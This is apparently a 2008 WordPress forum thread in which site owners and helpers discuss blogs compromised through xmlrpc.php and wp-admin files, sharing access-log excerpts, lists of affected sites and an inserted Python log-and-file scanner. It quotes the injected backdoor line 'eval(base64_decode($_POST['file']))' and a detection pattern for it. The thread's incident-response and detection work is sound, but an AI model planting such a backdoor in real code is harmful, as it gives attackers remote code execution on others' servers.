Hacking Problem
I have three blogs that I own. All of them are protected with the knowledge I have: .htaccess, encrypted password, etc… but I have been getting hacked lately. All of the sites are updated and I have checked the plugins and all are updated and have no problems… so what is the cause?
I keep getting this:
protected.com/logs/access.log:194.110.162.23 - - [24/Mar/2008:01:46:27 -0400] "POST /xmlrpc.php?3e97459f56c3c68f=61e9790d63df6a04 HTTP/1.1" 200 25 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
protected.com/logs/access.log:194.110.162.23 - - [24/Mar/2008:01:46:28 -0400] "POST /xmlrpc.php?3e97459f56c3c68f=61e9790d63df6a04 HTTP/1.1" 200 25 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
protected.com/logs/access.log:64.136.26.226 - - [24/Mar/2008:02:38:22 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 638 "https://www.protected.com/page/3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
protected.com/logs/access.log:64.136.26.226 - - [24/Mar/2008:02:38:22 -0400] "GET /xmlrpc.php HTTP/1.1" 200 54 "https://www.protected.com/page/3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
protected.com/logs/access.log:64.136.26.226 - - [24/Mar/2008:02:52:18 -0400] "GET /xmlrpc.php HTTP/1.1" 200 54 "https://www.protected.com/page/images/protected.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
protected.com/logs/access.log:64.136.26.226 - - [24/Mar/2008:02:52:18 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 638 "https://www.protected.com/page/images/protected.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
protected.com/logs/access.log:78.151.173.179 - - [24/Mar/2008:05:51:43 -0400] "GET /xmlrpc.php HTTP/1.1" 200 54 "https://www.protected.com/" "Dummy/1.00 (Windows NT 5.1; U; en-us)"
protected.com/logs/access.log:78.151.173.179 - - [24/Mar/2008:05:51:46 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 638 "https://www.protected.com/" "Dummy/1.00 (Windows NT 5.1; U; en-us)"
protected.com/logs/access.log:77.91.224.14 - - [24/Mar/2008:06:00:23 -0400] "GET /xmlrpc.php HTTP/1.1" 200 54 "-" "WebAlta Crawler/2.0 (https://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
protected.com/logs/access.log:77.91.224.14 - - [24/Mar/2008:06:03:01 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 638 "-" "WebAlta Crawler/2.0 (https://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
Once that appears in my logs I have several files with code injected and all of my files are touched to the same date.
https://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/
Good explanation…
Google for:
eval(base64_decode($_POST['file'])); exit;
Apparently XMLRPC is hackable!
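A defender-side check for the two signals in this thread: the xmlrpc.php POSTs carrying an opaque token query string in the first post's log excerpt, and the eval(base64_decode($_POST['file'])) marker quoted just above. This is an added example, not code from the thread or from WordPress; the log regex, the function names and the last sample line are my own assumptions, and the sample lines taken from the thread have their user agents shortened.

```python
import re

# Apache combined-log regex (constructed for this example; group names are mine).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')
# The injected marker quoted in the thread, tolerant of spacing and quote style.
INJECT_RE = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*\$_POST\s*\[')

def parse_line(line):
    """Parse one line; a grep-style 'host/logs/access.log:' prefix is dropped."""
    m = LOG_RE.match(line.split('access.log:', 1)[-1].strip())
    return m.groupdict() if m else None

def xmlrpc_verdict(rec):
    """None if not xmlrpc.php, 'benign' for normal traffic, else a reason string."""
    path, _, query = rec['path'].partition('?')
    if not path.endswith('/xmlrpc.php'):
        return None
    # RSD discovery GETs and plain POSTs (real XML-RPC clients) are everyday traffic.
    if (rec['method'], query) in (('GET', ''), ('GET', 'rsd'), ('POST', '')):
        return 'benign'
    if rec['method'] == 'POST':
        # No blog client sends an opaque key=value token on a POST; in the thread
        # this request immediately precedes the file injection, so alert on it.
        return 'POST with token query %r' % query
    return 'unexpected %s with query %r' % (rec['method'], query)

def suspicious_ips(lines):
    """Map IP -> reasons for every xmlrpc.php hit that is neither benign nor unparsable."""
    hits = {}
    for line in lines:
        rec = parse_line(line)
        verdict = xmlrpc_verdict(rec) if rec else None
        if verdict and verdict != 'benign':
            hits.setdefault(rec['ip'], []).append(verdict)
    return hits

def find_injection(php_source):
    """Offset of the eval(base64_decode($_POST[...])) marker in a file's text, or -1."""
    m = INJECT_RE.search(php_source)
    return m.start() if m else -1

# First three lines are from the thread (user agents shortened); the last is constructed.
SAMPLE = [
    'protected.com/logs/access.log:194.110.162.23 - - [24/Mar/2008:01:46:27 -0400] "POST /xmlrpc.php?3e97459f56c3c68f=61e9790d63df6a04 HTTP/1.1" 200 25 "-" "Mozilla/5.0"',
    'protected.com/logs/access.log:64.136.26.226 - - [24/Mar/2008:02:38:22 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 638 "https://www.protected.com/page/3" "Mozilla/4.0"',
    'protected.com/logs/access.log:77.91.224.14 - - [24/Mar/2008:06:00:23 -0400] "GET /xmlrpc.php HTTP/1.1" 200 54 "-" "WebAlta/2.0"',
    '203.0.113.5 - - [24/Mar/2008:07:00:00 -0400] "POST /xmlrpc.php HTTP/1.1" 200 312 "-" "Client/1.0"',
]
```

Run `suspicious_ips` over a whole access log and `find_injection` over each PHP file's contents; on the sample above only 194.110.162.23 is reported, while the RSD fetches and the plain XML-RPC POST stay quiet.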
VRocKs: There are no known exploits for WordPress 2.3.3. Are you running the latest version? Are you *SURE*?
Furthermore, the log you posted is showing somebody running an exploit, not somebody installing one. That exploit could have been added to your site through any of half a dozen other ways.
We need more information to confirm that this is a WordPress issue. Nothing you have given us confirms that or shows any sort of a clue on how you were hacked.
In other words, telling us WordPress has a problem is useless to us unless you can also tell us where the problem is.
There is also no indication this is primarily a WP problem, and not something underlying.
https://www.kidscoop.org/ is exploited and it’s inside their gallery installation.
https://www.larmac.com.au/ also popped up.
https://www.lentini.co.uk is hacked. I’ve emailed him; notice the old version?
https://www.jtechnica.com is hacked, with the hqc.php bits, even. And it’s not a wordpress install.
https://www.uneditedspirituality.ca/ is hacked with the hcq.php, and that’s Joomla.
https://www.spinlabs.ca/ is hacked and it’s an older version. Not real old, but still. And somehow, in a case of “hahah, you reap what you sow”, this person has *apparently* actively disabled the upgrade notices:
https://www.spinlabs.ca/wp-content/plugins/disable-wordpress-core-update/
https://jeremyduncan.ca/ is hacked, and the redirect to the spam content is able to be called right off his index.php page.
https://www.hansdreesen.com/ = hacked.
https://www.thinkerlabs.ca/jonmanafo is hacked. Another old version; I emailed him… no reply.
Those are just a few of the sites that popped up in the $_POST logging i have set up on one site that I am watching. Oddly enough, even over the course of a few days, the IP never changed: 216.246.56.146
I setup a honeypot for them…
I also put on an aluminum foil hat…
I will let you know…
it does appear like a wordpress problem. I have been having this lately–for the past few weeks. Look here:
https://mraziz.com/personal/2008/03/16/post-spam/
This same post mentioned above is injected with spam; no matter how many times I edit the post and remove it, it gets back, and comments are turned off too. I thought it was a problem with my host and I was hacked, so I changed my host to a new one; the same problem is happening. I’m using 2.3.3 and I’m sure about it.
Do you have any logs of how they’re doing it.
which logs do you need? or which file?
I can tell you how they’re doing it. We saw it in the $_POST logging. Donncha was made aware of it as well.
They’re calling a file behind wp-admin/. It cannot be replicated unless you are logged in as an admin. Not logged in, then you are properly redirected to login. And a simple subscriber acct, if you are logged in as such, is told they don’t have the necessary permissions.
The consensus was either it was a cookie or a password thing.
I am NOT sharing the file name, it serves no purpose for me to do so.
Well, how are they logging in then? I mean, I could login to your blog as you if I could get ahold of your cookies, but I don’t quite see how they’re getting those.
That was Donncha’s reaction, exactly, Otto. I’ve seen an attempted sql exploit that attempts to get the admin password but it fails on a wordpress 2.3.3 install, and as far as I could see, it’s old.
There are 2 things going on.
1. the wp-content/1 thing .. that attack is actually visible in your Apache logs. They use a core file behind wp-admin/ to create a rootshell on a file that already exists (that ought to give it away for you, otto)
2. The insertions into actual posts. That’s yet another file behind wp-admin/
Both of these require you to be logged in; the _noonce fails without a valid admin login.
I have examples of both of those, if you’re interested Otto. Just drop me an email.
So what shall I do to resolve this?
Start by changing your admin password. If you changed it once, change it again. And I don’t care what anyone says to the contrary, I would change the names of your cookies. Someone I helped mentioned seeing session variables inside one of their wordpress tables; I haven’t seen that anywhere though. If you see any, I would clear ’em.
If you want to be a guinea pig and try to help figuring out the problem, send me an email and we can set up some logging. It takes 2 minutes.
Anyway, if you as you say they are logging in as admin, why is it only happening to the most recent post only? If i were a spammer and I obtained admin access I would spam/alter all the posts and even mass post spam everywhere.
Anyway, if you as you say they are logging …
anyway?
I could answer your question by showing you the $_POST variables, I’m not going to.
I’ll assume by your lack of reply to my offer that you aren’t interested in actually seeing all of this for yourself, which btw, would have negated the necessity for such a question. Therefore, I wish you the best, and you may consider my offer rescinded.